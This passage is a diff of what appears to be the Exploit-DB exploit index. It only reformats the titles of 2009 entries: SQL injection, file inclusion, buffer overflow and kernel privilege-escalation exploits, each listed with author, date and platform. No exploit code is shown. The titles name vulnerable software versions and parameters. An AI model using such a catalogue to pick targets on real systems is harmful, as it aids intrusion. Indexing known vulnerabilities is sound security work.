9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - (.ht3) Local Buffer Overflow Exploit (SEH)",2009-06-29,hack4love,windows,local,0 9035,platforms/php/webapps/9035.txt,"Almnzm (COOKIE: customer) Remote SQL Injection",2009-06-29,Qabandi,php,webapps,0 -9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 -9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability",2009-06-29,"ThE g0bL!N",php,webapps,0 +9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 +9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure Vulnlerability",2009-06-29,"ThE g0bL!N",php,webapps,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - (.ht3) Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 9039,platforms/multiple/remote/9039.txt,"Cpanel - (lastvisit.html domain) Arbitrary File Disclosure (Auth)",2009-06-29,SecurityRules,multiple,remote,0 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip (book_id) Remote SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 -9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit",2009-06-29,jmp-esp,php,webapps,0 +9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 - (login grabber) Multiple SQL Injection Exploit",2009-06-29,jmp-esp,php,webapps,0 9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9044,platforms/php/webapps/9044.txt,"dm filemanager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 -9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 +9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 - (m3u/ppl) Universal Buffer Overflow Exploit (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 9048,platforms/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection Exploit",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 -9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 +9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod <= 1.1 - Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 @@ -8557,11 +8557,11 @@ id,file,description,date,author,platform,type,port 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 9073,platforms/php/webapps/9073.php,"YourTube <= 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps,0 -9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 +9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Remote Blind SQL Injection Exploit",2009-07-02,Qabandi,php,webapps,0 9077,platforms/php/webapps/9077.txt,"conpresso 3.4.8 - (detail.php) Remote Blind SQL Injection",2009-07-02,tmh,php,webapps,0 -9079,platforms/php/webapps/9079.txt,"Opial 1.0 (Auth Bypass) Remote SQL Injection",2009-07-02,Moudi,php,webapps,0 -9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 +9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Auth Bypass) Remote SQL Injection",2009-07-02,Moudi,php,webapps,0 +9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 @@ -8580,15 +8580,15 @@ id,file,description,date,author,platform,type,port 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - (SQL Injection/phpinfo()) Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 -9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 +9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 -9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 +9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 -9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 +9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - (uid) Remote SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (XSS/SQL/RCE) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 -9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 +9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress - Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 @@ -8611,12 +8611,12 @@ id,file,description,date,author,platform,type,port 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BoF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (bSQL/XSS) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 -9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 -9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 +9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 +9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 - (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash Exploit",2009-07-13,prodigy,windows,dos,0 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service Exploit",2009-07-13,"Shaun Colley",freebsd,dos,0 9135,platforms/linux/local/9135.sh,"Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 -9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 +9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x products.php SQL Injection",2009-07-13,Affix,php,webapps,0 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - (.wav) Crash Exploit",2009-07-14,prodigy,windows,remote,0 @@ -8633,7 +8633,7 @@ id,file,description,date,author,platform,type,port 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order <= 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS Lms <= 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - (.m3u .lst) Universal SEH Overwrite Exploit",2009-07-15,Stack,windows,local,0 -9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 +9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) RFI",2009-07-15,"Khashayar Fereidani",php,webapps,0 9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,"Khashayar Fereidani",php,webapps,0 @@ -8642,37 +8642,37 @@ id,file,description,date,author,platform,type,port 9159,platforms/php/webapps/9159.php,"Infinity <= 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 -9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 (profile.php) SQL Injection",2009-07-15,Arka69,php,webapps,0 +9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - (profile.php) SQL Injection",2009-07-15,Arka69,php,webapps,0 9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) ActiveX BoF PoC",2009-07-16,anonymous,windows,dos,0 -9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 -9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 (Auth Bypass) Remote SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 +9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 +9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Auth Bypass) Remote SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 9167,platforms/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 - Remote Buffer Overflow PoC",2009-07-16,LiquidWorm,windows,dos,0 -9168,platforms/windows/dos/9168.pl,"Zortam MP3 Player 1.50 (m3u) Integer Division by Zero Exploit",2009-07-16,LiquidWorm,windows,dos,0 +9168,platforms/windows/dos/9168.pl,"Zortam MP3 Player 1.50 - (m3u) Integer Division by Zero Exploit",2009-07-16,LiquidWorm,windows,dos,0 9169,platforms/windows/dos/9169.txt,"Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities",2009-07-16,LiquidWorm,windows,dos,0 9170,platforms/windows/dos/9170.txt,"Audio Editor Pro 2.91 - Remote Memory Corruption PoC",2009-07-16,LiquidWorm,windows,dos,0 -9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 +9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 9172,platforms/windows/local/9172.pl,"Hamster Audio Player 0.3a Universal Buffer Overflow Exploit (SEH)",2009-07-16,"ThE g0bL!N",windows,local,0 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - (.pst / .m3u) Heap Overflow PoC",2009-07-16,hack4love,windows,dos,0 -9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 +9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 9176,platforms/php/webapps/9176.txt,"dB Masters Multimedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Universal BoF Exploit",2009-07-16,Crazy_Hacker,windows,local,0 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - (.mp3) Crash Exploit",2009-07-16,prodigy,windows,dos,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 -9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 -9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 +9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 +9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9182,platforms/php/webapps/9182.txt,"AJOX Poll (managepoll.php) Authentication Bypass",2009-07-17,SirGod,php,webapps,0 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Auth Bypass SQL Injection / HTML Injection Vulnerabilities",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - (XSS/LFI) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - (.m3u) Universal Stack Overflow Exploit",2009-07-17,Stack,windows,local,0 9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline <= 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 -9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 +9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - (.html) Universal Stack Overflow Exploit",2009-07-17,ksa04,windows,local,0 9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Local Root Exploit (0Day)",2009-07-17,spender,linux,local,0 -9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9193,platforms/php/webapps/9193.pl,"WebVision 2.1 (news.php n) Remote SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 +9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 +9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) Remote SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 @@ -8681,9 +8681,9 @@ id,file,description,date,author,platform,type,port 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - (.mpl/.m3u) Local Heap Overflow PoC",2009-07-20,hack4love,windows,dos,0 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0 -9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 +9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - (LANG) Remote File Inclusion Vulnerabilities",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 -9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 +9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 @@ -8691,10 +8691,10 @@ id,file,description,date,author,platform,type,port 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - (.m3u) Local Heap Overflow PoC",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (Perl)",2009-07-20,netsoul,windows,remote,0 -9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 -9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow Exploit (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 +9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 +9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow Exploit (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 -9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 +9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Auth Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 @@ -8702,13 +8702,13 @@ id,file,description,date,author,platform,type,port 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpdirectorysource (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 -9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 +9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 9231,platforms/php/webapps/9231.txt,"Phorum <= 5.2.11 Permanent Cross-Site Scripting Vulnerabilities",2009-07-22,Crashfr,php,webapps,0 9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit",2009-07-23,NoGe,php,webapps,0 -9236,platforms/php/webapps/9236.txt,"GLinks 2.1 (cat) Remote Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 +9236,platforms/php/webapps/9236.txt,"GLinks 2.1 - (cat) Remote Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Auth Bypass Vulnerabilities",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla Component com_joomloads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Remote File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 @@ -8717,9 +8717,9 @@ id,file,description,date,author,platform,type,port 9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 -9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 -9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 -9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)",2009-07-24,Dr_IDE,osx,remote,0 +9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 +9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 +9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit (osx)",2009-07-24,Dr_IDE,osx,remote,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Auth Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"Xoops Celepar Module Qas (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Remote Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 @@ -8729,17 +8729,17 @@ id,file,description,date,author,platform,type,port 9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection (2)",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket <= 1.7.1 Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 -9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 -9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 +9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 - (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9263,platforms/php/webapps/9263.txt,"URA 3.0 (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 +9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (LFI/SQL) Multiple 